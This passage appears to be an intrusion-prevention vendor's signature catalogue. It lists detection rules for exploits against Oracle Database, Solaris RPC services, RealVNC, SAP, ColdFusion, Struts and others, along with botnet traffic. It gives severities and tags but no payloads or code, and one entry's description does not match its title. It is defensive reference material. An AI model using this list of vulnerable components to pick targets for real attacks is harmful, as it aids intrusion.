Generic_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation

About this situation: Usage of DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA, possible Oracle privilege escalation
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, Oracle 10g, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-361-4219
Vulnerability: Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
Description:
Back to top

Generic_Oracle-Database-DBMS-JVM-EXP-PERMS-System-Command-Execution

About this situation: An attempt to exploit a privilege escalation vulnerability in Oracle Database server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, Any Operating System not specific, Oracle Database not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-605-5211
Vulnerability: Oracle-Database-DBMS_JVM_EXP_PERMS-System-Command-Execution
Description:
Back to top

Generic_Oracle-Database-DBMS-Snap-Internal-Package-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Oracle Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-DBMS_Snap_Internal-Package-Buffer-Overflow
Description:
Back to top

Generic_Oracle-Database-REPCAT-RPC.VALIDATE-REMOTE-RC-SQL-Injection

About this situation: Attempt to exploit an SQL injection vulnerability in Oracle Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2009, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-241-3038
Last changed: sgpkg-ips-241-3038
Vulnerability: Oracle-Database-REPCAT_RPC.VALIDATE_REMOTE_RC-SQL-Injection
Description:
Back to top

Generic_Oracle-Database-Server-CREATE-TABLES-SQL-Injection

About this situation: An attempt to exploit an SQL injection vulnerability in the Oracle Database Server package CTXSYS.DRVXTABC detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2009, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: Oracle-Database-Server-CREATE_TABLES-SQL-Injection
Description:
Back to top

Generic_Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Oracle Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2008, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-173-2032
Vulnerability: Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow
Description:
Back to top

Generic_Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection

About this situation: Detects SQL injection exploits against Oracle Database Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 10g, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection
Description:
Back to top

Generic_Oracle-Database-Server-DBMS-Metadata-Package-SQL-Injection

About this situation: Detects SQL injection exploits against Oracle Database Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: Oracle-Database-Server_DBMS-Metadata-Package-SQL-Injection
Description:
Back to top

Generic_Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection

About this situation: An attempt to exploit an SQL injection vulnerability in the Oracle Workspace Manager component detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2009, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-263-3038
Last changed: sgpkg-ips-274-4219
Vulnerability: Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection
Description:
Back to top

Generic_Oracle-Database-Server-SDO-CS-TRANSFORM-LAYER-Buffer-Overflow

About this situation: Detects buffer overflow attempts against Oracle Database Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, Oracle 10g, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server-SDO_CS-TRANSFORM_LAYER-Buffer-Overflow
Description:
Back to top

Generic_Oracle-Database-Server-SQL-Query-Directory-Traversal

About this situation: Detects directory traversal exploits against Oracle Database Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-72-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server-SQL-Query-Directory-Traversal
Description:
Back to top

Generic_Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection

About this situation: SQL injection attempt using a vulnerability in Oracle Database Server package SYS.KUPV
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection
Description:
Back to top

Generic_Oracle-Database-Server-Sys-KUPV-SQL-Injection

About this situation: SQL injection attempt using a vulnerability in Oracle Database Server package SYS.KUPV
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 10g, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-56-1210
Last changed: sgpkg-ips-356-4219
Vulnerability: Oracle-Database-Server-Sys-KUPV-SQL-Injection
Description:
Back to top

Generic_Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Oracle Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2007, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass
Description:
Back to top

Generic_Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in the 'sys.pbsde.init' stored procedure in Oracle database
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-355-4219
Vulnerability: Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow
Description:
Back to top

Generic_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection

About this situation: Detects SQL Injection attacks against the Oracle Database Server SYS.KUPW$WORKER package
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2006, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
Description:
Back to top

Generic_Oracle-Secure-Backup-NDMP-Username-BOF

About this situation: Attempt to exploit username buffer overflow in Oracle Secure Backup
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-203-2032
Vulnerability: Oracle-Secure-Backup-NDMP-Connect-Username-BOF
Description:
Back to top

Generic_Oracle-Secure-Backup-observiced.exe-Buffer-Overflow-2

About this situation: An Oracle Secure Backup observiced.exe Buffer Overflow vulnerability
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2010, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Oracle-Secure-Backup-observiced.exe-Buffer-Overflow
Description:
Back to top

Generic_Oracle-SQL-Database-Compromise

About this situation: Detects SQL Injection attack trying to compromise Oracle SQL server
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2006, Any Operating System not specific, Oracle Database not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-SQL-Injection-Database-Compromise
Description:
Back to top

Generic_Oracle-Sys-Pbsde-Init-BOF

About this situation: Buffer overflow vulnerability in Oracle sys.pbsde.init stored procedure
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Sys-Pbsde-Init-BOF
Description:
Back to top

Generic_Oracle-WebCache-Invalid-Request-DoS

About this situation: Detects denial of service of Web Cache Admin with malformed URI
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Oracle 9i, CVE2002, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Oracle-WebCache-Invalid-Request-DoS
Description:
Back to top

Generic_PowerD-WHATIDO-Format-String

About this situation: Detects Power Daemon (powerd) WHATIDO format string exploits
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Power Daemon, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: PowerD-WHATIDO-Format-String
Description:
Back to top

Generic_Quest-NetVault-Smartdisk-Libnvbasics.dll-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Quest Software NetVault SmartDisk detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Quest Software NetVault SmartDisk, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-432-4219
Vulnerability: Quest-NetVault-Smartdisk-Libnvbasics.dll-Denial-Of-Service
Description:
Back to top

Generic_RDP-Client-Remote-Code-Execution-MS09-044

About this situation: Possible attack against MS09-044 detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-237-3038
Last changed: sgpkg-ips-237-3038
Vulnerability: RDP_Microsoft-Remote-Desktop-Client-Vulnerability-MS09-044
Description:
Back to top

Generic_RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow

About this situation: Buffer overflow exploit against RealNetworks Helix Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix Universal Server, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: RTSP-RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow
Description:
Back to top

Generic_RealNetworks-Helix-Universal-Server-RTSP-Describe-BOF

About this situation: Attemp to exploit a buffer overflow in Helix Universal Server
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, RealNetworks Helix Universal Server, CVE2002, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-158-2032
Vulnerability: RealNetworks-Helix-Universal-Server-RTSP-Describe-BOF
Description:
Back to top

Generic_RealVNC-Authentication-Bypass-Command-Execution

About this situation: Detects a command execution exploit against RealVNC
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealVNC Free Edition, RealVNC Personal Edition, RealVNC Enterprise Edition, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-143-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: RealVNC-Authentication-Bypass
Description:
Back to top

Generic_RealVNC-Authentication-Required

About this situation: RealVNC server requires an authentication method to be used
Context: TCP Server Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, RealVNC Free Edition, RealVNC Personal Edition, RealVNC Enterprise Edition, CVE2006, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-448-4219
Vulnerability: RealVNC-Authentication-Bypass
Description:
Back to top

Generic_RealVNC-Connection-Attempt-Without-Authentication

About this situation: Connection attempt to RealVNC server without using any authentication method
Context: TCP Client Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, RealVNC Free Edition, RealVNC Personal Edition, RealVNC Enterprise Edition, CVE2006, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-371-4219
Vulnerability: RealVNC-Authentication-Bypass
Description:
Back to top

Generic_Rlpr-Format-Strings-Attack

About this situation: Attempted format strings attack on rlpr
Context: TCP Client Stream Unknown
Severity: 7
Tags: IRIX, Any Hardware, rlpr, CVE2004, IRIX not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Rlpr-Msg-Format-Strings-Vulnerability
Description:
Back to top

Generic_RPC-Cde-Dtspcd-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow in Solaris dtspcd
Context: TCP Client Stream Unknown
Severity: 7
Tags: Solaris, Any Hardware, Open Group CDE, CVE2001, Solaris not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: RPC-Cde-Dtspcd-Buffer-Overflow
Description:
Back to top

Generic_RPC-Librpc.dll-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EMC Legato NetWorker detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Legato NetWorker, CVE2009, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-291-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: Multiple-Vendors-Librpc.dll-Stack-Buffer-Overflow
Description:
Back to top

Generic_RPC-Linux-Nfs-Mountd-Buffer-Overflow

About this situation: Buffer overflow in rpc.mountd
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, rpc.mountd, CVE1999, Linux not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: RPC-Linux-Nfs_Mountd-Buffer-Overflow
Description:
Back to top

Generic_RPC-Nfs-Export-Query

About this situation: Detected portmapper export query
Context: TCP Client Stream Unknown
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-239-3038
Vulnerability: RPC-Portmapper-Access
Description:
Back to top

Generic_RPC-sadmind-ADM-Method-Buffer-Overflow

About this situation: Buffer overflow in sadmind
Context: UDP Packet Unknown
Severity: 10
Tags: Solaris 9, Solaris 8, Any Hardware, RPC, CVE2008, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-181-2032
Last changed: sgpkg-ips-181-2032
Vulnerability: RPC-sadmind-ADM-Method-BOF
Description:
Back to top

Generic_RPC-sadmind-NETMGT-PROC-Service-Buffer-Overflow

About this situation: Buffer overflow in sadmind
Context: UDP Packet Unknown
Severity: 7
Tags: Solaris 7, Sun Solaris 2.6, Any Hardware, RPC, CVE1999, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: RPC-sadmind-BOF
Description:
Back to top

Generic_RPC-sadmind-RPC-Request-Integer-Overflow

About this situation: Buffer overflow in sadmind
Context: UDP Packet Unknown
Severity: 7
Tags: Solaris 9, Solaris 8, Any Hardware, RPC, CVE2008, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: Sun-Solaris-sadmind-RPC-Request-Integer-Overflow
Description:
Back to top

Generic_RPC-Status-GHBN-Format-String

About this situation: Format string vulnerability in nfsutils
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, nfs-utils, CVE2000, Linux not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: RPC-Status-GHBN-Format-String-Vulnerability
Description:
Back to top

Generic_RPC-Xdr-Array-Buffer-Overflow-1

About this situation: Attempt to exploit a buffer overflow in Solaris XDR implementation
Context: UDP Packet Unknown
Severity: 7
Tags: Unix, Any Hardware, rpc.cmsd, MS2002, CVE2002, Unix not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-348-4219
Vulnerability: RPC-Xdr-Array-Buffer-Overflow
Description:
Back to top

Generic_RTSP-RealNetworks-Helix-DNA-Server-Require-Header-Buffer-Overflow

About this situation: Possible buffer overflow exploit against RealNetworks Helix DNA server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix DNA Server, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: RTSP-RealNetworks-Helix-DNA-Server-Require-Header-Buffer-Overflow
Description:
Back to top

Generic_Safenet-License-Manager-UDP-Buffer-Overflow

About this situation: Safenet License Manager buffer overflow vulnerability
Context: UDP Packet Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, SafeNet Sentinel, CVE2005, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-663-5211
Vulnerability: HTTP-Safenet-License-Manger-UDP-Buffer-Overflow
Description:
Back to top

Generic_SAP-License-Manager-2005-Buffer-Overflow

About this situation: An attempt to exploit a buffer overlfow vulnrability in SAP License Manager
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, SAP License Manager, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-237-3038
Last changed: sgpkg-ips-237-3038
Vulnerability: SAP_SAP-License-Manager-2005-Buffer-Overflow
Description:
Back to top

Generic_SAP-MaxDB-Remote-Arbitrary-Commands-Execution

About this situation: An attempt to exploit command injection vulnerability in SAP MaxDB detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SAP MaxDB, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-395-4219
Vulnerability: SAP_SAP-MaxDB-Remote-Arbitrary-Commands-Execution
Description:
Back to top

Generic_SMB2-Header-On-Plain-TCP

About this situation: SSH Server-Detected-In Nonstandard Port
Context: TCP Server Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-478-5211
Description:
Back to top

Generic_Solaris-sadmind-Weak-Authentication

About this situation: Attempt to access Sun Solaris sadmind using weak authentication method
Context: UDP Packet Unknown
Severity: 10
Tags: Solaris 9, Solaris 8, Any Hardware, CVE2003, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Solaris-sadmind-Auth-Sys-System-Compromise
Description:
Back to top

Generic_SpamAssassin-Spamd-Vpopmail-And-Paranoid-Options-Code-Execution

About this situation: Attempt to inject commands via a crafted username string in the User header
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SpamAssassin, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SpamAssassin-Spamd-Vpopmail-And-Paranoid-Options-Code-Execution
Description:
Back to top

Generic_SS-Adobe-ColdFusion-Dataservicescfproxy-Commons-Beanutils-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion (2016 release) detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1107-5242
Vulnerability: Adobe-ColdFusion-Dataservicescfproxy-Commons-Beanutils-Insecure-Deserialization
Description:
Back to top

Generic_SS-Adobe-ColdFusion-Dataservicescfproxy-Rome-Framework-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion (2016 release) detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Adobe-ColdFusion-Dataservicescfproxy-Rome-Framework-Insecure-Deserialization
Description:
Back to top

Generic_SS-Adobe-Flash-Player-RTMP-Error-Message-Object-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2012, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-503-5211
Vulnerability: Adobe-Flash-Player-RTMP-Error-Message-Object-Type-Confusion
Description:
Back to top

Generic_SS-Advantech-Domain-Focused-Configuration-Tool-DoS

About this situation: A vulnerability in Advantech Domain Focused Configuration Tool
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech Domain Focused Configuration Tool, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Advantech-Domain-Focused-Configuration-Tool-DoS
Description:
Back to top

Generic_SS-Agobot-IRC-Activity

About this situation: Botnet IRC Activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Generic_CS-Agobot-IRC-Activity
Description:
Back to top

Generic_SS-Ainslot.b-Traffic

About this situation: Ainslot.B traffic detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Ainslot.b-Malware
Description:
Back to top

Generic_SS-Apache-Struts-2-Commons-Fileupload-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts 2 detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1275-5242
Vulnerability: Apache-Struts-2-Commons-Fileupload-Insecure-Deserialization
Description:
Back to top

Generic_SS-ATT-WinVNC-Client-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in ATT WinVNC Client.
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, VNC, CVE2001, Windows not specific, VNC not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-662-5211
Last changed: sgpkg-ips-662-5211
Vulnerability: ATT-WinVNC-Client-Buffer-Overflow
Description:
Back to top

Generic_SS-Automated-Solutions-Modbus_DoS

About this situation: A vulnerability in Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, Modbus SCADA, Windows not specific, Linux not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Vulnerability: Automated-Solutions-Modbus_DoS
Description:
Back to top

Generic_SS-Blizzard-World-Of-Warcraft

About this situation: Detected login to World of Warcarft online game
Context: TCP Server Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Blizzard World of Warcraft, Windows not specific, Online Gaming Protocols, TCP Server Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: Blizzard-World-Of-Warcraft-Usage
Description:
Back to top

Generic_SS-Botnet-Al3na.hotgirls-Activity

About this situation: Detected botnet al3na.hotgirls activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Al3na.hotgirls-Botnet
Description:
Back to top

Generic_SS-Botnet-Al3na.monster-Activity

About this situation: Al3na.monster botnet activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Al3na.monster-Botnet
Description:
Back to top

Generic_SS-Botnet-Al3na.weakpatheticfool-Activity

About this situation: Detected botnet al3na.weakpatheticfool activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Al3na.weakpatheticfool-Botnet
Description:
Back to top

Generic_SS-Botnet-Spybot-Activity

